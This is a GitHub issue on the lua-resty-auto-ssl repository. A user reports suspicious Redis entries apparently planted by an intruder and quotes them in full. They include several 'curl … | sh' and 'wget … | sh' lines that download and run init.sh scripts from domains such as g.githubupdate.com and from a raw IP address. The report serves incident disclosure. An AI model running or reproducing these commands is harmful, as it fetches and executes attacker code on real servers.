auto-ssl / lua-resty-auto-ssl

On the fly (and free) SSL registration and renewal inside OpenResty/nginx with Let's Encrypt.
MIT License
1.94k stars 181 forks source link

Security issue #279

Open ruiluis opened 2 years ago

ruiluis commented 2 years ago

Dont know if here is the right place to inform.. but here it is.. i have a web server running openresty/1.19.9.1 luarocks-3.8.0 and lua-resty-auto-ssl only have 2 domains so today i check the redis storage to see the ssl keys and i notice some strange entries named backup1 to 10. so i check the entries and they were like this /4 cdt -fsSL http://g.githubupdate.com/pkg/init.sh | sh /5 wdt -q -O- http://g.githubupdate.com/pkg/init.sh | sh /2 cd1 -fsSL http://a.amdupdatepkg.com/pkg/init.sh | sh /3 wd1 -q -O- http://a.amdupdatepkg.com/pkg/init.sh | sh /4 cd1 -fsSL http://g.githubupdate.com/pkg/init.sh | sh /5 wd1 -q -O- http://g.githubupdate.com/pkg/init.sh | sh /2 * curl -fsSL http://190.123.45.54/pkg/init.sh | sh i have secured my servers to only have http and https no connection to redis the only way to access to redis was through openresty/ lua-resty-auto-ssl e try to check logs everything but i didnt found anything.. did someone already saw this?